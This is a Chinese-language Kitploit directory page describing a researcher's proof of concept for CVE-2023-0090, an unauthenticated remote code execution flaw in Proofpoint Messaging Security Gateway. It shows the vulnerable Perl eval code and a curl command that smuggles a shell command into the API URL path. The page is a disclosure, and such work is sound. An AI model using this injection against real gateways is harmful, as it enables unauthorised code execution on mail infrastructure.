Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
proofpoint-CVE-2023-0090 — Proofpoint 邮件网关:未认证 RCE | Kitploit
工具/GitHubGitHub/ly1g3/proofpoint-cve-2023-0090
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubly1g3/proofpoint-cve-2023-0090

proofpoint-CVE-2023-0090

Proofpoint 邮件网关:未认证 RCE

查看仓库
11个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

关于

安全研究员:ly1g3,ly1g3[at]tuta.io

GPG 指纹:https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586

概述:远程代码执行 - 未认证 RCE

CVE:CVE-2023-0090

时间线:

  • 发现 - ly1g3
  • 报告 - ly1g3
  • 修复 - Proofpoint

Proofpoint Messaging Security Gateway 8.18.4.73-8.18.4.73

Proofpoint Messaging Security Gateway 的漏洞利用

远程代码执行(RCE)

通过访问 WebServices API,可以在未经认证的情况下实现具有管理员权限的 RCE。

技术细节

Webservices.pm 未对用户输入进行清理或检查。访问该函数无需认证,但必须在设置中启用 API 访问才能执行 RCE。$module 直接来自用户数据并被 eval 执行。

root@kitploit:~

my $module = (split(/\//,$uri))[1];
$module = SERVICE_MODULE_PREFIX() . "::\u$module";

...


eval("require $module");

概念验证(POC)

将在 /tmp/ 下创建名为 abc 的文件。代码以 pps 用户身份运行。

root@kitploit:~
curl -k -vv "https://192.168.80.80:10010/ws/abc%2bsystem(%60id%20>%20\\\$\{SHELL:0:1\}tmp\\\$\{SHELL:0:1\}abc%60)"
下载工具